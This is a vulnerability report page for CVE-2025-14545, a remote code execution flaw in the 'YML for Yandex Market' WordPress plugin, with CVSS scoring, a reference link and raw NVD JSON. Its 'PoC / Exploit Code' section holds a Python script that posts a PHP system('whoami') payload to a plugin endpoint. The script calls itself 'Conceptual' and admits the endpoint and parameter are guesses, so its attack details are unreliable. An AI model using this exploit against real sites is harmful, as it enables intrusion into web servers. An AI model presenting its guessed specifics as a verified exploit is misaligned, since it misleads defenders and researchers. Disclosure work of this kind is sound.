Security Vulnerability Report
CVE-2025-14545 CVSS 6.5 MEDIUM

CVE-2025-14545

Published: 2026-04-10 07:16:20
Last Modified: 2026-04-15 15:05:48

Description

The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

YML for Yandex Market < 5.0.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-14545 Proof of Concept (Conceptual)
# Target: YML for Yandex Market WordPress Plugin < 5.0.26
# Description: Remote Code Execution via feed generation.
# Note: Adjust the target URL and payload parameters based on the actual vulnerable endpoint.
target_url = "http://example.com/wp-content/plugins/yml-for-yandex-market/includes/export.php"

# Malicious payload to execute a system command (e.g., whoami)
# The specific parameter depends on the plugin's implementation (e.g., filter or product options)
payload = {
    "action": "y4ym_export_feed",
    "filter": "system('whoami');"
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:")
        print(response.text)
        # Logic to check if command output is present in the response
        if "www-data" in response.text or "root" in response.text:
            print("[!] Potential RCE confirmed!")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14545", "sourceIdentifier": "[email protected]", "published": "2026-04-10T07:16:19.607", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "references": [{"url": "https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/", "source": "[email protected]"}]}}